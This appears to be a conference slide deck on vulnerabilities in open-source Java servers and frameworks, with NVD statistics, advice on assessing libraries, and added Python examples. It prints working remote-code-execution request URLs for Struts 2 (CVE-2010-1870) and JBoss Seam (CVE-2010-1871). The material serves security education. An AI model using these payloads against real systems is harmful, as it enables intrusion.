
Security Vulnerabilities in Open Source Java Libraries

Patrycja Wegrzynowicz CTO, Yonita, Inc.

About Me

• Programmer at heart • Researcher in mind • Speaker with passion • Entrepreneur by need

@yonlabs

Agenda

• Motivation and methodology
• Security vulnerabilities
  – Stats and examples
  – App and web servers
  – Web frameworks
• Approach to security
  – What to look for
  – Where to look at

Disclaimer

I do not aim at bashing OSS!

"Hello World in cloud is involve 1 load balancer, 3 web server and 2 database server"

DevOps_Borat, Twitter

Underneath

Application

Libraries

App & Web Servers

Databases

Operating Systems

Infrastructure


Sources

• The National Vulnerability Database – NIST Computer Security Division – DHS National Cyber Security Division/US CERT – http://nvd.nist.gov/

• The Open Source Vulnerability Database – Open Security Foundation – http://www.osvdb.org/

• The Exploit Database – http://www.exploit-db.com/

Common Vulnerability Scoring System v2

Base metrics and their possible values:

Access Vector (AV):       Local / Adjacent Network / Network
Access Complexity (AC):   High / Medium / Low
Authentication (Au):      Multiple instances / Single instance / None
Confidentiality (C):      None / Partial / Complete
Integrity (I):            None / Partial / Complete
Availability (A):         None / Partial / Complete

Common Weakness Enumeration

Vulnerability Types (NVD to CWE Mapping)

• Authentication Issues
• Credentials Management
• Permissions, Privileges, and Access Control
• Buffer Errors
• Cross-Site Request Forgery (CSRF)
• Cross-Site Scripting (XSS)
• Cryptographic Issues
• Path Traversal
• Code Injection
• Format String Vulnerability
• Configuration
• Information Leak/Disclosure
• Input Validation
• Numeric Errors
• OS Command Injections
• Race Condition
• Resource Management Errors
• SQL Injection
• Link Following
• Other
• Not in CWE
• Insufficient Information
• Design Error

App & Web Servers

Market share (survey by ZeroTurnaround): Tomcat 33%, JBoss 26%, WebLogic 10%, Jetty 8%, GlassFish 8%, WebSphere 7%, Other 8%

Number of Vulnerabilities, OSS (based on NVD)

Tomcat 100, JBoss AS 7, JBoss EAP 20, GlassFish 14, Jetty 20

Number of Vulnerabilities, OSS and Proprietary (based on NVD)

Tomcat 100, JBoss AS 7, JBoss EAP 20, GlassFish 14, Jetty 20, WebLogic 185, WebSphere 201

Number of Vulnerabilities, OSS vs Proprietary (based on NVD)

OSS (5 platforms): 29%
Proprietary (2 platforms): 71%

[Chart: Vulnerabilities by Year, OSS (Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty), 2000 to 2012, one bar per server; based on NVD]

[Chart: Vulnerabilities by Year, OSS + Proprietary (adds WebLogic and WebSphere), 2000 to 2012, one bar per server; based on NVD]

[Chart: Vulnerabilities by Year, OSS, 2000 to 2012, same data drawn stacked per year; based on NVD]

[Chart: Vulnerabilities by Year, OSS and Proprietary, 2000 to 2012, same data drawn stacked per year; based on NVD]

Vulnerabilities Scoring

[Chart: number of vulnerabilities per server (Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic, WebSphere) by CVSS v2 base-score bucket; based on NVD]

Buckets as used on the slide: LOW [0,4), MEDIUM [4,7), HIGH [7,8), CRITICAL [8,9), WTF?! [9,10]

Confidentiality Impact (number of vulnerabilities, based on NVD)

Server      None / Partial / Complete
Tomcat       36  /   62    /   2
JBoss AS      0  /    6    /   1
JBoss EAP     6  /   13    /   0
GlassFish     7  /    6    /   1
Jetty         8  /   12    /   0
WebLogic     51  /  112    /  22
WebSphere    71  /   99    /  32

Integrity Impact (number of vulnerabilities, based on NVD)

Server      None / Partial / Complete
Tomcat       55  /   45    /   0
JBoss AS      2  /    4    /   1
JBoss EAP    10  /    9    /   0
GlassFish     5  /    8    /   1
Jetty         9  /   11    /   0
WebLogic     76  /   91    /  18
WebSphere    71  /   99    /  32

Availability Impact (number of vulnerabilities, based on NVD)

Server      None / Partial / Complete
Tomcat       71  /   28    /   1
JBoss AS      2  /    4    /   1
JBoss EAP    11  /    9    /   0
GlassFish     6  /    5    /   3
Jetty        14  /    6    /   0
WebLogic     82  /   83    /  20
WebSphere    71  /   99    /  32

Vulnerability Types by Server

[Chart: share (0% to 100%) of each vulnerability type per server; based on NVD]

Types shown: Authentication Issues, Credentials Management, Permissions, Privileges, and Access Control, Buffer Errors, CSRF, XSS, Cryptographic Issues, Path Traversal, Code Injection, Configuration, Information Leak, Input Validation, Numeric Errors, Race Condition, Resource Management Errors, SQL Injection, Link Following, Design Error, Unknown

Top 3 Vulnerabilities

[Chart: the three most frequent vulnerability types for each of Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic, WebSphere; based on NVD]

Types appearing in a top 3: Credentials Management, Permissions, Privileges, and Access Control, CSRF, XSS, Path Traversal, Information Leak, Input Validation

3 and More Vulnerabilities

[Chart: vulnerability types with at least three entries per server, for Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic, WebSphere; based on NVD]

Types shown: Authentication Issues, Credentials Management, Permissions, Privileges, and Access Control, CSRF, XSS, Cryptographic Issues, Path Traversal, Configuration, Information Leak, Input Validation, Resource Management Errors, Design Error

Total Vulnerabilities by Type

[Chart: total number of vulnerabilities (0 to 60) per type, stacked by server (Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic, WebSphere); based on NVD]

Types in chart order: Cross-Site Scripting (XSS), Permissions, Privileges, and Access Control, Information Leak, Input Validation, Resource Management Errors, Design Error, Cryptographic Issues, Path Traversal, Authentication Issues, Credentials Management, Cross-Site Request Forgery (CSRF), Configuration, Buffer Errors, Code Injection, Numeric Errors, Race Condition, Link Following, SQL Injection

Max CVSS v2: 10.0 – CVE-2011-0807 (published 2011-04-20)

Unspecified vulnerability in Oracle Sun GlassFish Enterprise Server 2.1, 2.1.1, and 3.0.1, and Sun Java System Application Server 9.1, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Administration.

• AV: Network • AC: Low • Au: None required • C: Complete • I: Complete • A: Complete • CWE: Insufficient Information

Min CVSS v2: 1.2 – CVE-2010-3718 (published 2011-02-10)

Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.

• AV: Local access • AC: High • Au: None required • C: None • I: Partial • A: None • CWE: Design Error

Web Frameworks

Vulnerabilities, Selected Frameworks

[Chart: number of vulnerabilities (0 to 16) for Struts 2, JBoss Seam and GWT]

Apache Struts 2 (latest release 2.3.4.1)

CVE-2010-1870 exploit (Struts 2)

• Found by Meder Kydyraliev, who also published the exploit
• Based on his previous bug, XW-641:
  – ('\u0023' + 'session[\'user\']')(unused)=0wn3d
  – evaluates as #session['user']=0wn3d
  – i.e. ActionContext.getContext().getSession().put("user", "0wn3d")
  – ParametersInterceptor blacklists # in parameter names to prevent tampering with server-side data

CVE-2010-1870: Struts 2 (published 2010-08-17)

The OGNL extensive expression evaluation capability in XWork in Struts 2.0.0 through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly other products, uses a permissive whitelist, which allows remote attackers to modify server-side context objects and bypass the # protection mechanism in ParameterInterceptors via the (1) #context, (2) #_memberAccess, (3) #root, (4) #this, (5) #_typeResolver, (6) #_classResolver, (7) #_traceEvaluations, (8) #_lastEvaluation, (9) #_keepLastEvaluation, and possibly other OGNL context variables, a different vulnerability

• AV: Network • AC: Low • Au: None required • C: None • I: Partial • A: None • CWE: Design Error (NVD-CWE-DesignError)

CVE-2010-1870 exploit

• Guards:
  – xwork.MethodAccessor.denyMethodExecution
  – #_memberAccess.allowStaticMethodAccess
• Exploit by Meder Kydyraliev:
  – #_memberAccess['allowStaticMethodAccess'] = true
  – #foo = new java.lang.Boolean("false")
  – #context['xwork.MethodAccessor.denyMethodExecution'] = #foo
  – #rt = @java.lang.Runtime@getRuntime()
  – #rt.exec("touch /tmp/dir", null)

As a single request (the # , = and , characters are written as Java unicode escapes so the interceptor's blacklist never sees them):

/HelloWorld.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(ssss)((\u0023rt('mkdir\u0020/tmp/PWNED'\u002cnull)))=1
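The mechanism behind the request above is validate-then-decode: the interceptor inspects the raw parameter name, while OGNL later resolves the \u0023 escapes inside the quoted literal and executes an expression containing the very # that was banned. The following added example (my code, not XWork's) models that gap. The blacklist character set, the allowlist regex and decode_java_escapes() are simplified stand-ins for the pre-fix check, the post-fix check and OGNL's literal parsing respectively; they are assumptions for the demonstration, not the framework's code. The parameter names are the two intact ones from the exploit URL on the slide and the XW-641 name, with %20 already URL-decoded as the container would do.

```python
"""Why '\\u0023' slipped past a '#' blacklist: validate-then-decode, modelled.

Added example, not code from the talk or from Struts/XWork. DANGEROUS models
the pre-CVE-2010-1870 blacklist check on raw parameter names (assumption),
ACCEPTED models the later allowlist (assumption), and decode_java_escapes()
stands in for OGNL resolving Java-style \\uXXXX escapes inside string literals.
"""
import re

# Characters the modelled blacklist refuses anywhere in a parameter name.
DANGEROUS = set("#=,:")

# Modelled allowlist: only these characters may appear in a parameter name.
# Backslash, '+', '"' and '@' are all outside it, so escaped payloads fail.
ACCEPTED = re.compile(r"[a-zA-Z0-9.\]\[()_'\s]+")

# Raw parameter names as they reach the interceptor (taken from the slide).
PAYLOAD_NAMES = [
    "('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)",
    "(aaa)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']"
    "\\u003d\\u0023foo')(\\u0023foo\\u003dnew java.lang.Boolean(\"false\")))",
    "('\\u0023' + 'session[\\'user\\']')(unused)",          # XW-641
]
BENIGN_NAME = "user.address[0].street"   # an ordinary bean-path parameter


def blacklist_accepts(name):
    """Pre-fix style check: refuse only if a banned character is present."""
    return not (set(name) & DANGEROUS)


def allowlist_accepts(name):
    """Post-fix style check: the whole name must consist of accepted characters."""
    return ACCEPTED.fullmatch(name) is not None


def decode_java_escapes(text):
    """Resolve \\uXXXX escapes the way a Java-style literal parser does."""
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)


def audit(name):
    """What each check says about one raw parameter name, and what OGNL would see."""
    decoded = decode_java_escapes(name)
    return {
        "blacklist_on_raw": blacklist_accepts(name),        # what the old check saw
        "blacklist_on_decoded": blacklist_accepts(decoded), # what it should have checked
        "allowlist_on_raw": allowlist_accepts(name),        # the fixed check
        "decoded": decoded,
    }


def bypasses(name):
    """True when the raw blacklist passes a name whose decoded form it would reject."""
    r = audit(name)
    return r["blacklist_on_raw"] and not r["blacklist_on_decoded"]


if __name__ == "__main__":
    for n in PAYLOAD_NAMES + [BENIGN_NAME]:
        r = audit(n)
        print(f"{'BYPASS ' if bypasses(n) else 'ok     '}"
              f"raw-blacklist={r['blacklist_on_raw']} allowlist={r['allowlist_on_raw']}  {r['decoded']}")
```

Every payload name passes the raw blacklist and fails it once decoded, which is exactly the CVE; the allowlist rejects them on the raw form because a backslash is never a legal parameter-name character, while the benign bean path passes all three checks. The general lesson is to validate the canonical (decoded) form, or to allowlist rather than blacklist.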

CVE-2010-1871: JBoss Seam (published 2010-08-05)

JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.

• CVSS v2: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) • CWE: Input Validation

CVE-2010-1871 exploit

• Found by Meder Kydyraliev, who also provided the exploit

/seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'mkdir /tmp/PWNED')}

The URL-decoded actionOutcome carries an EL expression (#{...}) that reaches java.lang.Runtime through reflection; the indices [7] and [19] pick getRuntime() and exec() out of getDeclaredMethods(), whose order is not specified by the JDK, so they depend on the JVM build the target runs.

How to Assess the Security Level of a Library?

What to Look For?

• Vulnerabilities and trend
• Complexity
• Culture

The best indicator of the library’s future security is culture that places value on security and clear evidence of broad and rigorous security analysis.

Jeff Williams, CEO, Aspect Security

What to Look For?

• Known security vulnerabilities in an OSS library, and their trend over time
• Library complexity: its design and its dependencies
• Security in the software development process of an OSS library
  – Security during development
    • Security built into the development process
  – Security during issue handling
    • Clear and transparent issue handling
    • Details withheld until a fix is available
    • Security response team
    • Security bulletins
    • Releases and release notes containing security information

Where to Look At?

• Vulnerability databases
  – Open Source Vulnerability Database
  – National Vulnerability Database
  – Exploit Database
• Vendor site
  – Development process
  – Issue tracker
  – Security bulletins
  – Release notes
• Dependency hell
  – Use the support of a dependency management tool (e.g. dependency update reports in Maven)
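The "dependency hell" point is where the databases and the build tool meet: the check that matters is whether the versions actually resolved in your pom.xml fall inside a published affected range, with version numbers compared numerically rather than as strings. The following added example (my code, not a tool from the talk) does that for a constructed pom.xml against a tiny hand-written table whose ranges are transcribed from the two CVE descriptions quoted on the slides (CVE-2010-3718: Tomcat 7.0.0 through 7.0.3, 6.0.x, 5.5.x; CVE-2010-1870: Struts 2.0.0 through 2.1.8.1). The artifact coordinates and the property-based versions are assumptions for the example; a real scan takes its ranges from NVD and resolves the full parent/BOM hierarchy.

```python
"""Flag Maven dependencies whose versions fall inside affected ranges.

Added example, not tooling from the talk. POM is a constructed sample; the
affected ranges are transcribed from the CVE descriptions quoted on the slides
(CVE-2010-3718 for Tomcat, CVE-2010-1870 for Struts 2). A real scan takes its
ranges from NVD instead of a hand-written table.
"""
import re
import xml.etree.ElementTree as ET

NS = {"m": "http://maven.apache.org/POM/4.0.0"}

# Constructed pom.xml: a vulnerable Struts, a fixed Tomcat (via a property),
# an unrelated Jetty, and a Seam version whose property is never defined.
POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <properties><tomcat.version>7.0.4</tomcat.version></properties>
  <dependencies>
    <dependency><groupId>org.apache.struts</groupId><artifactId>struts2-core</artifactId><version>2.1.8.1</version></dependency>
    <dependency><groupId>org.apache.tomcat</groupId><artifactId>tomcat-catalina</artifactId><version>${tomcat.version}</version></dependency>
    <dependency><groupId>org.eclipse.jetty</groupId><artifactId>jetty-server</artifactId><version>8.1.5.v20120716</version></dependency>
    <dependency><groupId>org.jboss.seam</groupId><artifactId>jboss-seam</artifactId><version>${seam.version}</version></dependency>
  </dependencies>
</project>"""

# Per (groupId, artifactId): ("range", low, high) is inclusive at both ends;
# ("prefix", p) stands in for the slide's "6.0.x" / "5.5.x" wording.
ADVISORIES = {
    ("org.apache.struts", "struts2-core"): [("CVE-2010-1870", "range", "2.0.0", "2.1.8.1")],
    ("org.apache.tomcat", "tomcat-catalina"): [
        ("CVE-2010-3718", "range", "7.0.0", "7.0.3"),
        ("CVE-2010-3718", "prefix", "6.0."),
        ("CVE-2010-3718", "prefix", "5.5."),
    ],
}


def version_key(version):
    """Sort key comparing dotted versions numerically: 2.1.10 > 2.1.8.1 > 2.1.8.
    Numeric parts are tagged 0 and qualifiers 1, so ints and strings never meet."""
    return tuple((0, int(p)) if p.isdigit() else (1, p) for p in re.split(r"[.\-]", version))


def affected(version, rule):
    """Does this resolved version fall inside one advisory rule?"""
    kind = rule[1]
    if kind == "range":
        return version_key(rule[2]) <= version_key(version) <= version_key(rule[3])
    if kind == "prefix":
        return version.startswith(rule[2])
    raise ValueError(f"unknown rule kind {kind!r}")


def resolve(value, props):
    """Expand a ${property} reference; None when this pom does not define it."""
    m = re.fullmatch(r"\$\{([^}]+)\}", value or "")
    return props.get(m.group(1)) if m else value


def scan(pom_xml):
    """Return (findings, unresolved). findings maps (group, artifact, version) to
    sorted CVE ids; unresolved lists dependencies whose version is not known here
    (inherited or undefined), which must be checked after full resolution."""
    root = ET.fromstring(pom_xml)
    props_el = root.find("m:properties", NS)
    props = {} if props_el is None else {el.tag.split("}")[-1]: el.text for el in props_el}
    findings, unresolved = {}, []
    for dep in root.findall(".//m:dependency", NS):
        g = dep.findtext("m:groupId", namespaces=NS)
        a = dep.findtext("m:artifactId", namespaces=NS)
        v = resolve(dep.findtext("m:version", namespaces=NS), props)
        if v is None:
            unresolved.append((g, a))
            continue
        hits = {r[0] for r in ADVISORIES.get((g, a), []) if affected(v, r)}
        if hits:
            findings[(g, a, v)] = sorted(hits)
    return findings, unresolved


if __name__ == "__main__":
    found, open_items = scan(POM)
    for (g, a, v), cves in found.items():
        print(f"VULNERABLE {g}:{a}:{v} -> {', '.join(cves)}")
    for g, a in open_items:
        print(f"UNRESOLVED {g}:{a} (version not defined in this pom)")
```

On the sample pom this flags struts2-core 2.1.8.1 (the last version inside the CVE-2010-1870 range), clears Tomcat 7.0.4 only after expanding the property, ignores Jetty, and reports the Seam dependency as unresolved rather than silently passing it; the last case is the one a quick grep over pom.xml misses.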


@yonlabs